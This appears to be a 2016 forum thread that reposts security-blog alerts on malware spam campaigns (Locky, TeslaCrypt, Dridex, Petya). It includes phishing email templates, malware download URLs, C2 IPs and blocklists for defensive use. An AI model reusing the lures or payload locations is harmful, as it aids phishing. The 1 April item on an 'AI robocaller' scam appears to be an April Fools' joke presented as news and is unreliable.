129.121.192.16: https://www.virustot...16/information/
>> https://www.virustot...765d7/analysis/
87.117.242.13

** https://virustotal.c...58d7e/analysis/
___

Fake 'New Order' SPAM - malicious attachment
- http://blog.dynamoo....2016280375.html
29 Mar 2016 - "This -fake- financial spam comes with a malicious attachment:
    From:    Rose Lu [salesdeinnovative@ technologist .com]
    Date:    29 March 2016 at 02:30
    Subject:    Re: New Order P2016280375
    Good Day,
    Please find enclosed our new order P2016280375 for your kind attention and prompt execution.
    I look forward to receiving your order acknowledgement in due course.
    Best regards
    Rose Lu
    Office Manager
    Suzhou  Eagle Electric Vehicle Manufacturing Co., Ltd.
    Add: No.99, Yin Xin Road, Guo Xiang Town, Suzhou, China ...

Attached is a file New Order P201628037.docx which I have seen a single variant of, with a VirusTotal detection rate of 8/58*. The Malwr report** is inconclusive, but does appear to to show an OLE embedded object within the Word document. There are some interesting strings near the beginning of the object..
Crypted.exe
C:\Users\user\Desktop\Crypted.exe
C:\Users\user\AppData\Local\Temp\Crypted.exe
So, this looks like ransomware. Some inexpert fiddling with the contents of the OLE file yields an executable, and automated reports [1] [2] [3] show network traffic to the domain marchborn .no-ip .biz hosted on: 105.112.39.114 (Airtel, Nigeria)
I strongly recommend that you -block- traffic to that IP. In fact, the entire very large 105.112.0.0/12 is very sparsely populated and contains a small handful of legitimate Nigerian domains plus a load of Dynamic DNS domains (I've recommended blocking those before***) so you might want to consider -blocking- those too."
* https://www.virustot...2ece1/analysis/

** https://malwr.com/an...TYyMzE1MTYzZTk/

1] https://malwr.com/an...DgzODViNmE5ZGY/
Hosts
105.112.39.114

2] https://www.hybrid-a...environmentId=1
Contacted Hosts
105.112.39.114

3] https://sandbox.deep...8ab956bb66e3c0/

*** http://blog.dynamoo....ht-want-to.html
___

Fake 'Sent from my iPhone' SPAM - leads to Locky ransomware
- http://blog.dynamoo....-sent-from.html
29 Mar 2016 - "... These spam emails look like the victim is sending them to themselves (but they aren't*). Reference numbers vary a little between emails, but the basic pattern is:
    From:    victim
    To:    victim
    Date:    29 March 2016 at 17:50
    Subject:    CCE29032016_00034
      Sent from my iPhone

Attached is a RAR archive with a name that matches the subject (e.g. CCE29032016_00034.rar) and this contains a malicious .js file that leads to Locky ransomware. My contact tells me that the download locations in the scripts are:
3r .com .ua/ty43ff333.exe
canadattparts .com/ty43ff333.exe
chilloutplanet .com/ty43ff333.exe
gazoccaz .com/ty43ff333.exe
hindleys .com/ty43ff333.exe
jeweldiva .com/ty43ff333.exe
kandyprive .com/ty43ff333.exe
labonacarn .com/ty43ff333.exe
silvec .com/ty43ff333.exe
tbde .com .vn/ty43ff333.exe
zecapesca .com/ty43ff333.exe
This payload has a detection rate of 4/56**. The malware calls back to:
84.19.170.249 (Keyweb, Germany / 300GB.ru, Russia)
5.135.76.18 (OVH, France / Bondhost, Montenegro)
109.234.35.128 (McHost, Russia)
McHost is almost purely a black-hat ISP in my opinion and should be blocked-on-sight.
Recommended blocklist:
84.19.170.249
5.135.76.18
109.234.35.0/24 "
* http://blog.dynamoo....yself-spam.html

** https://www.virustot...76760/analysis/
TCP connections
84.19.170.249: https://www.virustot...49/information/
>> https://www.virustot...fcd59/analysis/

5.135.76.18: https://www.virustot...18/information/
>> https://www.virustot...b5e43/analysis/

109.234.35.128: https://www.virustot...28/information/
>> https://www.virustot...fc893/analysis/
___

Locky ransomware downloads -hijacked- by vigilante - delivering Eicar test file...
- https://myonlinesecu...t-file-instead/
29 Mar 2016 - "Another set of -empty/blank- emails that pretend to come from your own email address. This particular bunch have multiple subjects but all starting with 'CCE29032016' and attachments that also start with 'CCE29032016'. Some of the subjects and attachments I have seen include:
    CCE29032016_00095.jpg
    CCE29032016_00065.docx
     CCE29032016_00067.tiff
    CCE29032016_00050.pdf
    CCE29032016_00002.gif
These are obviously designed to make you think they are coming from a printer, scanner or Multi-functional device on your network. They are -not- image or word files despite the extensions and icons saying they are:
> https://myonlinesecu.../fake-files.png
These attachments are -not- what they appear to be and are actually renamed zip files with the icons of the files they pretend to be, containing a js file. These files download what is -supposed- to be Locky ransomware from several locations. The ones I have discovered so far include:
    http ://chilloutplanet .com/ty43ff333.exe
    tbde. com .vn/ty43ff333.exe
    canadattparts .com/ty43ff333.exe
... add to the twist all the files that I have seen are -not- Locky ransomware but instead all of these already compromised sites have been discovered  by what we think is a “white hat” hacker vigilante who has replaced the locky files with a “safe” file that contains the words 'STUPID LOCKY' then a load of symbols that I won’t post here and EICAR-STANDARD-ANTIVIRUS-TEST-FILE. This would or should be flagged by EVERY antivirus in existence as the Eicar test file (and for that reason I will not post it even in plain text, because many antiviruses would immediately block access to this site). See screenshot:
> https://myonlinesecu...tupid-locky.png
It looks like most 'victims' will have been lucky this time, although I am sure there will be some sites in this malspam run that didn’t get discovered by the vigilante and -continue- to infect victims... -Never- attempt to open a zip directly from your email, that is a guaranteed way to get infected. The best way is to just -delete- the unexpected zip and not risk any infection."

chilloutplanet .com: 109.71.69.138: https://www.virustot...38/information/

tbde. com .vn: 162.243.4.79: https://www.virustot...79/information/

canadattparts .com: 104.131.133.51: https://www.virustot...51/information/
>> https://www.virustot...00c4d/analysis/
___

'Petya' ransomware encrypts files, disks, locks users out of computers
- https://www.helpnets...ocks-computers/
March 29, 2016 - "A -new-  type of ransomware does not only encrypt the victims’ files, but also their disk’s Master File Table (MFT), and it replaces the boot drive’s existing Master Boot Record (MBR) with a malicious loader. It makes the entire computer -unusable- until the ransom is paid or until the victims decide to cut their losses, repair the MBR themselves, and reinstall Windows. The ransomware is called Petya, and is currently being delivered via spear-phishing campaigns aimed at German companies’ HR departments. The -fake- emails are made to look like they are coming from a legitimate job seeker, and instruct the recipient to download the sender’s CV from a Dropbox account. If the recipient falls for the trick, downloads the file, fails to notice that it’s an executable and runs it, the computer will crash because Petya overwrites the MBR of the entire hard drive. The computer will then show the infamous “Blue Screen of Death,” and reboot. The next thing the victim sees is a -fake- CHKDSK notice:
> https://www.helpnets...fake-chkdsk.jpg
GData researchers have examples* of the spear-phishing emails, and a video of Petya in action. Trend Micro researchers confirmed** that the ransomware encrypts both part of the disk and victims’ files. They have also notified Dropbox of the fact that their service is being used to propagate the malware, and the company has removed the malicious file along with other links that stored the same file. The malware doesn’t allow the user to restart the computer in Safe Mode. According to Bleeping Computer’s Lawrence Abrams, there is currently no way to restore the files without paying the ransom, nor to decrypt the MFT. Users can repair the MBR and reinstall Windows, but all their files will be lost..."
* https://blog.gdataso...pts-hard-drives

** http://blog.trendmic...sers-computers/

 

Video 0:51 > http://arstechnica.c...ypts-hard-disk/
 

  

Edited by AplusWebMaster, 30 March 2016 - 01:34 PM.

[AplusWebMaster]

FYI...

- https://atlas.arbor....ndex#-318909613
"... At the present, Locky developers are completely reliant upon some level of user interaction. Educating your workforce on potential threats and the overall threat vectors is still the best way to inhibit threats like Locky."

Fake 'Additional Info' SPAM - leads to ransomware
- http://blog.dynamoo....nformation.html
30 Mar 2016 - "This spam has a malicious attachment, leading to ransomware.
    From:    Joe holdman [holdmanJoe08@ seosomerset .co.uk]
    Date:    30 March 2016 at 08:55
    Subject:    RE: Additional Information Needed #869420
    We kindly ask you to provide us additional information regarding your case.
    Please find the form attached down below.

The reference number varies in the subject. The attachment is a ZIP file containing elements of the recipients email address and words like "copy" or "invoices" plus a random number. These unzip into a folder called "letter" to give a .js file beginning with "letter_" and a .wrn file which also appears to be a script but which won't run by default. An analysis of three scripts [1] [2] [3] shows binary downloads from:
cainabela .com/zFWvTM.exe
downloadroot .com/vU4VAZ.exe
folk.garnet-soft .com/jDFXfL.exe
This binary has a detection rate of 6/56*. Automated analysis [4] [5] shows network traffic to:
93.170.131.108 (Krek Ltd, Russia)
5.135.76.18 (OVH, France / Bondhost, Montenegro)
82.146.37.200 (TheFirst-RU, Russia)
These characteristics are consistent with Locky ransomware.
Recommended blocklist:
93.170.131.108: https://www.virustot...08/information/
>> https://www.virustot...9c486/analysis/
5.135.76.18: https://www.virustot...18/information/
>> https://www.virustot...227df/analysis/
82.146.37.200: https://www.virustot...00/information/
>> https://www.virustot...cbbd2/analysis/
"
1] https://www.virustot...sis/1459325489/

2] https://www.virustot...sis/1459325501/

3] https://www.virustot...sis/1459325510/

* https://www.virustot...sis/1459325587/

4] https://www.hybrid-a...environmentId=4

5] https://sandbox.deep...0292fcc77cd45e/
___

Fake 'scanner, prtr' SPAM - leads to Locky ransomware
- https://myonlinesecu...cky-ransomware/
20 Mar 2016 - "... another series of emails that pretend to be coming from a scanner, printer or multifunctional device at your own email domain with a zip attachment is another one from the current bot runs... In exactly the same way as one of yesterday’s malspam runs* the subjects pretend to be emailing an image or document file:
* https://myonlinesecu...t-file-instead/
Some of the subjects seen today include:
    Emailing: FILE-57146596.tiff
    Emailing: docment-6419593.tiff
    Emailing: sheet 462244150.JPEG
    Emailing: DOC-109.JPEG
    Emailing: file_29.TIFF
    Emailing: list-51210168.docx ...
One of the emails looks like:
From: CANON <CANON@ your-own-email-domain >
Date: Wed 30/03/2016 12:41
Subject: Emailing: FILE-57146596.tiff
Attachment:FILE-57146596.tiff.zip
    Your message is ready to be sent with the following file or link attachments:
    FILE-57146596.tiff
    Note: To protect against computer viruses, e-mail programs may prevent sending or receiving certain types of file attachments. Check your e-mail security settings to determine how attachments are handled...

30 March 2016: FILE-57146596.tiff.zip: Extracts to: 414-7888138-1994311.js - Current Virus total detections 5/56*
 downloads Locky ransomware from
 http ://tmecvn .com/45t3443r3 (VirusTotal 9/56**). Other download locations... include:
 http ://bezuhova .ru/45t3443r3
 http ://thespinneyuk .com/45t3443r3
 http ://tishaclothing .co.za/45t3443r3
 http ://formalizar .com.br/45t3443r3
 http ://tde.tne .cl/45t3443r3
 http ://journal.egostile .net/45t3443r3
 http ://cheapairticketindia .net/45t3443r3
 http ://creditfinancebank .ru/45t3443r3 and I am sure loads of others will appear during the day... This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1459336685/

** https://www.virustot...sis/1459341039/
TCP connections
5.135.76.18: https://www.virustot...18/information/
>> https://www.virustot...227df/analysis/
___

Fake -Multiple- Subjects/senders/content SPAM - download Locky ransomware
- https://myonlinesecu...cky-ransomware/
30 Mar 2016 - "... a whole series of -different- email -subjects- and body-content coming from random-senders downloading Locky ransomware from multiple-places...
Some of the subjects include:
    FW:Expenses Report # 109681 – 03/2016
    payment confirmation
    Additional Costs
    recent bill
    RE: Additional Information Needed #075573

The bodies of these emails have -varied- content like these:
    We kindly ask you to provide us additional information regarding your case.
    Please find the form attached down below.
-Or-
    Dear xerox.774,
    Please see attached file regarding clients recent bill. Should you need further assistances lease feel free to email me.
    Best regards
    Cleo Morris
    Chief Executive Officer

... These -all- download Locky ransomware from -various- sites, some of which include:
    http ://drirenaeris .com.au/b7eir  (VirusTotal 3/56*)
    http ://fabiocaminero .com/2L5pGE.exe  (VirusTotal 7/56**)
    http ://cssrd.org.lb/VPNQ4Z.exe  (VirusTotal 7/56***) ...
These are -more- of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1459341652/
TCP connections
51.254.240.45: https://www.virustot...45/information/
>> https://www.virustot...2e2bd/analysis/

** https://www.virustot...sis/1459343160/

*** https://www.virustot...sis/1459343160/

- http://blog.dynamoo....s-leads-to.html
30 Mar 2016 - "... -another- malicious spam run... drops Locky ransomware. Again... phones home to the -same- IPs reported here[1]."
1] http://blog.dynamoo....nformation.html
___

Fake 'scanned document' SPAM - doc macro malware
- https://myonlinesecu...-macro-malware/
29 Mar 2016 - "An email with the subject of 'scanned document' pretending to come from Tara Savill <tara@ charismabathrooms .com> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...

Screenshot: https://myonlinesecu...nt-1024x642.png

29 March 2016: CCF26062014_00002.docm - Current Virus total detections 7/57*
.. MALWR** shows a download of Dridex banking malware from
 http ://1901.magflags .de/media/5478hj.exe
Other sites: some of which were also in THIS earlier run*** ... include:
 http ://youngstownliquidation .com/5478hj.exe
 http ://balikmalzemelerim .com/5478hj.exe
 http ://me-shop .net/5478hj.exe
 http ://stremyanki .kz/5478hj.exe
 http ://mojomojito .com/5478hj.exe
 http ://baldwinsun .com/media/5478hj.exe ...
DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1459249209/

** https://malwr.com/an...mUzZmEzZmIxMTQ/
Hosts
144.76.126.6: https://www.virustot....6/information/
>> https://www.virustot...62087/analysis/

*** https://myonlinesecu...-macro-malware/
 

  

Edited by AplusWebMaster, 30 March 2016 - 09:30 AM.

[AplusWebMaster]

FYI...

Fake 'Print' SPAM - JS malware leads to Locky ransomware
- https://myonlinesecu...cky-ransomware/
31 Mar 2016 - "A series of emails with the basic subject of 'print' pretending to come from random names with a number at Gmail .com with a zip attachment is another one from the current bot runs which downloads Locky ransomware... Some of the subjects I have seen so far include:
    print please
    hi prnt
    print
    hello print
One of the emails looks like:
From: admin <andrew03@ gmail .com>
Date: Mon 04/01/2016 13:31
Subject: print please
Attachment: New Text Document (3).rar
–40719049546ef6119a6e83c9e005
Content-Type: text/plain; charset=UTF-8
–40719049546ef6119a6e83c9e005
Content-Type: text/html; charset=UTF-8
<div dir=”ltr”><br></div>
–40719049546ef6119a6e83c9e005–
–bf5dda1905937f96d0871d6d3006
Content-Type: application/octet-stream; name=”New Text Document (3).rar ...

31 March 2016: New Text Document(3).rar: Extracts to: New Text Document(95).js - Current Virus total detections 4/57*
.. MALWR** didn’t show any download but a manual analysis of the JS file gave me Locky Ransomware from
 http ://bianca .com .tr/87h78rf33g (VirusTotal 4/57***)... This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1459419468/

** https://malwr.com/an...jZjYTI5ZjJiY2M/

*** https://www.virustot...sis/1459419544/
TCP connections
88.198.119.177: https://www.virustot...77/information/
___

Fake 'FaxEmail' SPAM - JS malware leads to Locky ransomware
- https://myonlinesecu...cky-ransomware/
31 Mar 2016 - "An email with the subject of 'FaxEmail Fax from 0632136978' (random number) pretending to come from random number @ f2em .com with a zip attachment is another one from the current bot runs which downloads Locky ransomware...

Screenshot: https://myonlinesecu...78-1024x585.png

31 March 2016: 783836325-7101s-452012.zip: Extracts to: 21255715-6613c-370201.js
 Current Virus total detections 4/56*. MALWR** shows a download of Locky Ransomware from
 http ://mentaldevelopment .ir/87h78rf33g (VirusTotal 3/57***)
Other download locations so far discovered include:
 http ://meimeiwang .com.cn/87h78rf33g
 remontobuvidoma .ru/87h78rf33g (giving a '404 not found')
 anop .ir/87h78rf33g
... This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1459428459/

** https://malwr.com/an...TJmZjNiZjkzODE/
Hosts
185.8.173.39
81.177.181.164

*** https://www.virustot...sis/1459428606/
TCP connections
88.198.119.177
___

Fake 'Photos' SPAM - JS malware delivers Locky ransomware
- https://myonlinesecu...cky-ransomware/
31 Mar 2016 - "A blank/empty email with the subject of 'Photos' pretending to come from Nadia María Ochoa <nadia_m_ochoa018@ yahoo .es> (random numbers after nadia_m_ochoa) with a zip attachment is another one from the current bot runs... The email looks like:
From: Nadia María Ochoa <nadia_m_ochoa018@ yahoo .es>
Date: Thu 31/03/2016 14:32
Subject: Photos
Attachment: Photos.zip

Body content: Totally Blank

31 March 2016: Photos.zip: Extracts to: 84628561-8282f-490006.js - Current Virus total detections 4/57*
.. downloads Locky ransomware from
 site.ipark .tur.br/87h78rf33g (VirusTotal 3/57**). Others sites discovered include
 http ://mrsweeter .ru/87h78rf33g which is currently giving a '404' although was used earlier today for delivering Locky. It is almost certain that all the sites in THIS*** post which are delivering the same Locky ransomware file will also be used in a -differing- version of this email... This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1459431093/

** https://www.virustot...sis/1459428606/
TCP connections
88.198.119.177: https://www.virustot...77/information/
>> https://www.virustot...21a7d/analysis/

*** https://myonlinesecu...cky-ransomware/
 

  

Edited by AplusWebMaster, 31 March 2016 - 09:56 AM.

[AplusWebMaster]

FYI...

Fake 'REFUND DEPOSIT' SPAM - fake PDF malware
- https://myonlinesecu...ke-pdf-malware/
Updated: 1 Apr 2016 - "An email with the subject of 'YOUR REFUND DEPOSIT COPY' pretending to come from Lloyds Bank <refund@ lloydsbank .co.uk> with a zip attachment is another one from the current bot runs...

Screenshot: https://myonlinesecu...EPOSIT-COPY.png

31 March 2016: Attach.zip: Extracts to: Deposit Slip.exe - Current Virus total detections 8/57*
.. MALWR** | Payload Security***
This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1459447576/

** https://malwr.com/an...DFjYzg5ZWQ2NzI/

*** https://www.reverse....environmentId=4
Contacted Hosts
5.254.112.27
___

Fake 'photos' 'selfie' SPAM - JS malware
- https://myonlinesecu...-es-js-malware/
1 Apr 2016 - "... numerous emails with the subject of 'images', 'photos' or 'selfie' pretending to come from random names and numbers at yahoo .es with a zip attachment is another one from the current bot runs which downloads what looks like Locky ransomware... some of these with no extension for the attachment... One of the email looks like:
From: Maite STEPHENS <GALEANA965@ yahoo .es>
Date: Fri, 01 Apr 2016 10:35:17 +0100
Subject: images
Attachment: Photos(80).zip

Body content: Empty/blank body

1 April 2016: Photos(80).zip: Extracts to: IMG0000024405.js - Current Virus total detections 3/56*
.. downloads what looks like Locky ransomware from
 http ://rhcequestrian .com/89uyg65fyguy (VirusTotal 5/57**)... This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1459503374/

** https://www.virustot...sis/1459503652/
TCP connections
88.198.119.177: https://www.virustot...77/information/
>> https://www.virustot...21a7d/analysis/
___

Fake 'Votre demande' SPAM - JS malware leads to Locky ransomware
- https://myonlinesecu...cky-ransomware/
1 Apr 2016 - "... an email written in French with the subject of 'Votre demande – 4906548' [random numbered]  pretending to come from Darlene Walden <Darlene.Walden@ gouv .fr> with a zip attachment is another one from the current bot runs which downloads Locky Ransomware... The email looks like:
From: Darlene Walden <Darlene.Walden@ gouv .fr>
Date: Fri 01/04/2016 09:11
Subject: Votre demande – 4906548
Attachment: Cas_4906548.zip
    Monsieur / Madame,
    Nous avons bien recu votre mail nous demandant de ne pas donner suite a votre demande
    d’assurance du 01/04/2016 referencee en marge.
    De ce fait, nous procedons a l’annulation de cette derniere a sa date d’effet et vous
    precisons que vous ne pourriez vous prevaloir d’aucune garantie.
    Pour plus de details s’il vous plait verifier fichier joint (Cas_4906548)
    Nous vous remercions de bien vouloir en prendre note...
Translates to:
    Sir / Madam,
    We have received your mail asking us not to follow your request
    Insurance 04/01/2016 referenced margin.
    Therefore, we proceed to the cancellation of the latter has its effective date and you
    Note that you could avail you of any warranty.
    For more details please check attachment (Cas_4906548)
    Thank you kindly take note...

1 April 2016: Cas_4906548.zip: Extracts to: Cas_2466628.js - Current Virus total detections 3/57*
.. Payload Security** shows a download of Locky Ransomware from
 tag2change .com/images/old/note.exe (VirusTotal 2/56***)... This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1459501792/

** https://www.reverse....environmentId=4
Contacted Hosts
108.175.14.122: https://www.virustot...22/information/
>> https://www.virustot...9e550/analysis/

*** https://www.virustot...sis/1459502285/
___

Fake 'boss scams' meet AI robocallers - dangerous escalation of Fraud
- http://blog.dynamoo....callers-in.html
1 Apr 2016 - "Many of us will be familiar with the 'fake boss' scam. You're sitting at your desk when your CEO suddenly calls and asks you to transfer a large stack of currency to some shady-bank-account for a business transaction you are not allowed to talk about. This type of -fraud- is simple and can often pay out big bucks, but it is also labour intensive. Research has to be done on companies and -convincing- calls have to be made to unsuspecting-minions. Not only does this all take some time, but the more people involved in the scam then the more ways you have to split the booty.. and the greater the change of getting caught.
Now, the notorious Russian gang dubbed 'Den Duraka' by researchers have been discovered using a cunning new technique which makes this type of attack even more dangerous. Instead of relying on human beings to make the phone calls, they have now enrolled an AI-powered robocalling system called which promises to be a game-changer. Sporting the clumsy Russian acronym 'LOZHNYY', this is deeply integrated into LinkedIn, Facebook, Twitter and other social networks, with feeds into business directories using -hacked- credentials. Once it has found a CEO to impersonate, it scours the web for video and audio clips to get an idea of accents and mannerisms, and then it starts to research company filings and financial data. All of this is then combined with a wide range of pre-prepared scripts and some basic question-and-answer scenarios to make a deadly weapon in the hands of the scammers. Some of the conversational AI features are rudimentary, and LOZHNYY sometimes resorts to buzzword-laden nonsense when out of its depth. Victims report that they were -not- suspicious as this seemed consistent with the behaviour of their CEOs. Cybersecurity experts are struggling with ways to counter this new threat. At the moment their best advice is to completely -ignore- any communications from your CEO and indeed any C-level executive..."
___

Petya Ransomware - Malwarebytes analysis
- https://blog.malware...tya-ransomware/
April 1, 2016 - "Petya is different from the other popular ransomware these days. Instead of encrypting files one by one, it denies access to the full system by attacking low-level structures on the disk. This ransomware’s authors have not only created their own boot loader but also a tiny kernel, which is 32 sectors long. Petya’s dropper writes the malicious code at the beginning of the disk. The affected system’s master boot record (MBR) is overwritten by the custom boot loader that loads a tiny malicious kernel. Then, this kernel proceeds with further encryption. Petya’s ransom note states that it encrypts the full disk, but this is not true. Instead, it encrypts the master file table (MFT) so that the file system is -not- readable.
PREVENTION TIP: Petya is most dangerous in the Stage 2 of the infection, that starts when system is being rebooted after the BSOD caused by the dropper. In order to prevent your computer from going automatically to this stage, turn off automatic restart after a system failure (see how to do it):
> https://support.micr...en-us/kb/307973
If you detect Petya in Stage 1, your data still can be recovered. More information about it you can find here:
> https://hshrzd.wordp...ya-key-decoder/
... Behavioral analysis: This ransomware is delivered via scam emails themed as a job application. E-mail comes with a Dropbox link, where the malicious ZIP is hosted. This initial ZIP contains two elements:
- a -photo- of a young man, purporting to be an applicant (in fact it is a publicly-available-stock image)
- an -executable- pretending to be a CV in a self-extracting archive or in PDF (in fact it is a malicious dropper in the form of a 32bit PE file):
> https://blog.malware...petya_exe-1.png
In order to execute its -harmful- features, it needs to run with Administrator privileges. However, it doesn’t even try to deploy any user account control (UAC) bypass technique. It relies fully on social engineering. When we try to run it, UAC pops up this alert:
> https://blog.malware...3/uac_popup.png
After deploying the application, the system crashes. When it restarts, we see the following screen, which is an -imitation- of a CHKDSK scan:
> https://blog.malware...s/2016/03/1.png
In -reality- the malicious kernel is already encrypting. When it finishes, the affected user encounters this blinking screen with an ASCII art:
> https://blog.malware...s/2016/03/2.png
Pressing a key leads to the main screen with the ransom note and all information necessary to reach the Web panel and proceed with the payment:
> https://blog.malware...s/2016/03/3.png
... We noted that the website for the victim is well prepared and very informative. The menu offers several language versions, but so far only English works:
> https://blog.malware...ain-768x707.png
It also provides a step-by-step process on how affected users can recover their data:
> https://blog.malware...ide-768x707.png
... We expect that cybercriminals release as little information about themselves as possible. But in this case, the authors and/or distributors are very open, sharing the team name—”Janus Cybercrime Solutions”—and the project release date—12th December 2015...
Conclusion: In terms of architecture, Petya is very advanced and atypical. Good quality FUD, well obfuscated dropper – and the heart of the ransomware – a little kernel – depicts that authors are highly skilled. However, the chosen low-level architecture enforced some limitations, i.e.: small size of code and inability to use API calls. It makes cryptography difficult. That’s why the key was generated by the higher layer – the windows executable. This solution works well, but introduces a weakness that allowed to restore the key (if we manage to -catch- Petya at -Stage1- -before- the key is erased)..."
(More detail at the malwarebytes URL at the top of this post.)
___

Ransomware and Recent Variants
- https://www.us-cert....lerts/TA16-091A
March 31, 2016
___

- https://www.virusbul...n-threat-model/
"... Preventing macro malware from infecting your machine is really simple: -don't- enable macros, no matter how much a document urges you to do so..."
 

  

Edited by AplusWebMaster, 01 April 2016 - 12:52 PM.

[AplusWebMaster]

FYI...

Fake 'VeriFone' SPAM - JS malware
- https://myonlinesecu...ice-js-malware/
4 Apr 2016 - "An email with the subject of 'VeriFone Services UK and Ireland Ltd' pretending to come from donotreply_invoices@ verifone .com  with a zip attachment is another one from the current bot runs which downloads some sort of malware... The email looks like:
From: donotreply_invoices@ verifone .com
Date: Mon 04/04/2016 10:29
Subject: VeriFone Services UK and Ireland Ltd
Attachment: VeriFone_20160404095713.zip
    Please see attached Invoice(s).
    Thanks and Regards,
    VeriFone Services UK and Ireland Ltd
    Confidentiality Note: This email message contains information that is confidential. If you are not the intended recipient, you are hereby notified that any use, dissemination, distribution or copying of this message is prohibited. If you have received this message or attachment in error, please notify us immediately by email and delete the original...

4 April 2016:VeriFone_20160404095713.zip: Extracts to: VeriFone_20160404092434.js
Current Virustotal detections 3/57*. MALWR** shows a download from
 http ://tag2change .com/images/old/note.exe (VirusTotal 4/57***)... This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1459766150/

** https://malwr.com/an...Dc3MTA5NTMyYjI/
Hosts
108.175.14.122: https://www.virustot...22/information/
>> https://www.virustot...9e550/analysis/

*** https://www.virustot...sis/1459766714/
___

Fake 'Refund' SPAM - JS malware leads to Teslacrypt ransomware
- https://myonlinesecu...ypt-ransomware/
4 Apr 2016 - "An email with the subject of 'Refund for #18613 – $2,179,44' [random number, random amount]  pretending to come from random names, companies and email addresses with a zip attachment is another one from the current bot runs which downloads Teslacrypt ransomware... One of the  emails looks like:
From: Pongky Morrill <MorrillPongky34@ bitsport .ru>
Date: Mon 04/04/2016 12:20
Subject: Refund for #18613 – $2,179,44
Attachment: copy_nz_930864.zip
    Your refund request has been processed.
    Please, find the confirmation attached to this e-mail.

4 April 2016: copy_nz_930864.zip: Extracts to: letter_EWxago.js - Current Virus total detections 6/57*
.. MALWR** shows a download of a -new- version of Teslacrypt ransomware from
 http ://greetingseuropasqq .com/80.exe?1 (VirusTotal 7/57***)... This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1459768523/

** https://malwr.com/an...GQ4ZTZmZjU1YTU/
Hosts
54.212.162.6
217.70.180.150
107.180.43.132
107.180.4.122
76.162.168.113
192.186.220.8
71.18.247.59

*** https://www.virustot...sis/1459772578/
TCP connections
217.70.180.150
107.180.43.132
___

Fake 'photos' SPAM - from your own email address delivering Locky ransomware
- https://myonlinesecu...but-empty-zips/
4 Apr 2016 - "An email with the subject of 'Photos' [random number between 1 and 4] pretending to come from your own email address with a zip attachment is -supposed- to be another one from the current bot runs which downloads Dridex, Locky or some other malware but is malformed-and-misconfigured so the attached zip is -empty- ... They use email addresses and subjects that will entice a user to read the email and open the attachment...
Update: Some working copies now trickling through containing -nemucod- downloaders delivering Locky ransomware. The email looks like:
From: Your email address
Date: Mon 04/04/2016 10:48
Subject: Photos 3
Attachment: 20160404_074897_resized.zip
    Envoyé de mon Galaxy S6 edge+ Orange

Update: Managed to get a 'working' copy...
4 April 2016: 20160404_409472_resized.zip: Extracts to: 20160401_833019_resized.js
Current Virus total detections 2/57*.. downloads what looks like Locky ransomware from
 http ://taytantalya .com/54eftygub (VirusTotal 2/56**)
Some other locations seen include:
 hatgiongrangdong .com/54eftygub and
 amid-s .com.ua/54eftygub
 http ://2ws .club/54eftygub
 http ://asensor .com.sg/54eftygub
 http ://freya58 .ru/54eftygub
 http ://lindecoration .com/54eftygub
 http ://lxtrading .com.sg/54eftygub
 http ://sargentojoe .com.br/54eftygub
 http ://stylekoko .com/54eftygub
 http ://waxmod .com/54eftygub ...
This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1459764701/

** https://www.virustot...sis/1459763558/
TCP connections
91.209.77.86: https://www.virustot...86/information/
>> https://www.virustot...7d291/analysis/
___

Fake 'Your Booking' SPAM - JS malware leads to Teslacrypt
- https://myonlinesecu...ypt-ransomware/
4 Apr 2016 - "An email with the subject of 'Changes in Your Booking (Booking Nr:46081)' [random numbered] pretending to come from random names and email addresses with a zip attachment is another one from the current bot runs which downloads Teslacrypt... The email looks like:
From: Trudey Daniel <DanielTrudey588@ eskweb .net>
Date: Mon 04/04/2016 14:40
Subject: Changes in Your Booking (Booking Nr:46081)
Attachment: aqq_copy_830379.zip
    There has been some important change in your booking (Booking Nr:46081). Please review the confirmation below.

4 April 2016: aqq_copy_830379.zip: Extracts to: doc_xXsKNB.js - Current Virus total detections 5/57*
.. Downloads Teslacrypt from the same locations as This earlier post**... This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1459777068/

** https://myonlinesecu...ypt-ransomware/
___

Fake 'Your parcel' SPAM - JS malware
- https://myonlinesecu...yan-js-malware/
4 Apr 2016 - "An email with the subject of 'Your parcel #898322, Status: Arrived Otis Ryan' [random numbered]  pretending to come from Otis Ryan <cobranza@ moldecor .com> with a zip attachment is another one from the current bot runs which downloads some sort of malware... The email looks like:
